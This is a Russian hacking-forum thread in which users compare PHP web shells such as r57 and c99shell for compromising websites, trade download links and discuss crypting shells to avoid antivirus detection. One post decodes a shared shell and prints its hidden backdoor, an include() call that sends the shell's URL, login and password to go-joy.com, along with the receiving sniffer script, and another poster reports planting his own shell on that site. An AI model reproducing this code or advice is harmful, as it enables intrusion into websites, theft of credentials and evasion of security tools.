лазил по сайтам и нашел вот такой вот шел у кого есть его исходники хотелось бы на них посмотреть
Просто там есть функции не включеные ни в один из вышеперечисленных шелов.

http://slil.ru/25905609
http://webfile.ru/2027735

юзай поиск гдето тут был с модулем контры и цмс

сделай свой шелл на осносе этих, какие проблемы?
для каждого свой шелл лучше...

ИМХО* r57 лучший, есть все нужные функции...

этот будет покруче r57

туркин однозначно +

c99shell

c99shell
мне кажется этот покруче будет только вот на некоторых сайтах ошибка выдает
а так там и функции досай добавлены да и много еще чего r57shell v.1.42 отдыхает перед ним

... чего r57sheel ...
брррррр =\

dxshell

брррррр =\
опечаточка была

r57 хорош, но палится... Криптуем пачками!
-
А вообще для чего шелл? Для администрирования своего сайта? Для хека?
И у тех и других свои требования... От Внешнего вида и функционала до скрытности

так этот не палится же. Только вот на некоторых сайтах что то не так работает но вроде все функции доступны

имхо r57 модифицированный электом лучший

Неадекватный шелл, нету не малейшего обхода safe_mode (on).
error_reporting(ALL) ми плакать....

Для чего тебе надо?...а вообще - пиши свое ,например на базе електовского р57...пока круче не видел...

бред а не шелл
Warning: include(http://www.go-joy.com/upload/temp/rcv.php?url=http://scripts/shells/egy_spider.php&login=&pass=) [function.include]: failed to open stream: no suitable wrapper could be found in D:\server\scripts\shells\egy_spider.php(6) : eval()'d code(1) : eval()'d code on line 16

бред а не шелл
а ты на другом сайте попробуй просто у тебя gzip не стоит
так у него там функции доса не так много

... у кого есть его исходники хотелось бы на них посмотреть ...

Декодированный вебшелл:

_http://slil.ru/25905977

P.S. Avira ругнулась на него PHP/C99Shell.C

но на кодированныто то не ругается

heks, это вполне логично. Антивирь не сравнивал процесс работы шеллов...
Он просто сравнил сигнатуры.

ну в этом я не силен

а ты на другом сайте попробуй просто у тебя gzip не стоит
так у него там функции доса не так много
Причем здесь gzip?
function selfURL()
{
$s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : "";
$protocol = strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s;
$port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]);
return $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI'];
}
$url=SelfURL();
include("http://www.go-joy.com/upload/temp/rcv.php?url=".$url."&login=".$login."&pass=".$pass);
скрипт сливает адрес шелла автору. И накой такой шелл нужен?!

в каком смысл сливает?

в каком смысл сливает?

include("http://www.go-joy.com/upload/temp/rcv.php?url=".$url."&login=".$login."&pass=".$pass);

отправляет на www.go-joy.com логин и пасс от админки шелла ;/

Это - не шелл. Это - говно! А теперь по пунктам:
1. Он - говно.
2. Дизайн не его (изменены два-три цвета)
3. Движок не его (вообще ничего не изменено).
4. Он - говно
5. Он стучит о местоположение и аккаунте админа.
6. Аккаунт незашифрован.
7. Сниффер акков расположен на взломанном сайте (я туда, кстати, тоже шелл залил - http://www.go-joy.com/upload/temp/r57.php, поизучайте на :)).
8. Он - говно!

Содежржимое файла rcv.php (сниффера):

<? $file = fopen("here.txt","a"); $res=$_GET["url"]." ".$_GET["login"]." ".$_GET["pass"];
fputs($file,$res); fclose($file);?>


Содержимое here.txt:

http://microsoft.com/nowelnahuy.php fuckmoymosk vrotmnenogi../../

LoL! Кто-то прикололся)))

P.S. Я выкладываю УРЛ шелла ТОЛЬКО в целях показать сущность плагиатора для ТС и уважаемых Ачатовцев. Просьба не банить, не удалять, минусы не ставить.

P.P.S. Он - говно!!!

Содержимое here.txt:

http://microsoft.com/nowelnahuy.php fuckmoymosk vrotmnenogi../../

LoL! Кто-то прикололся)))



Мой отжог :)
Мне ктото месагу там оставил вместо моего шелла.
В аську стукнул,
Жду ответа.

include("http://www.go-joy.com/upload/temp/rcv.php?url=".$url."&login=".$login."&pass=".$pass);

пипец какой извращенский способ сообщить данные хозяину -удаленный инклуд не всегда работает - да и тупо както...
Проще fopen() -ом было бы))